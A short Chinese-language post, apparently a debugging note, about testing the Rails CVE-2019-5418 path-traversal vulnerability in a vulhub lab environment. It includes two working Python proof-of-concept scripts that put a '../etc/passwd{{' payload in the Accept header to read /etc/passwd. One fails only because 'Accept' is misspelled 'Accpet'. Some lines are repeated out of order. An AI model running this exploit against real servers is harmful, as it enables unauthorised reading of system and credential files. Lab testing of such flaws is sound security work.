小伙伴在测试 https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418 漏洞
写了个payload
根据github的payload能成功读取到/etc/passwd,然后自己写了一个

对比了一下发现,把Accept写成了Accpet。。。
写了个payload
payload= "../../../../../../../../etc/passwd{{" header = { "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", "Accept-Encoding": "gzip, deflate", "Accpet": payload } print header target_url=target+"/robots" res=util.get_url_response(target_url, method='GET', headers=header, timeout=5) print res.status_code if res.status_code==200 and re.search("root:[x*]:0:0:",res.text):
根据github的payload能成功读取到/etc/passwd,然后自己写了一个
import requests headers = { "Accept-Encoding": "gzip, deflate", "Accept": "../../../../../../../../etc/passwd{{", "Accept-Language": "en", "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)" } r = requests.get("http://xxx:3000/robots", headers = headers) print r.text也能成功读取,用wireshark抓包对比了一下发现小伙伴写的Accept没有生效
对比了一下发现,把Accept写成了Accpet。。。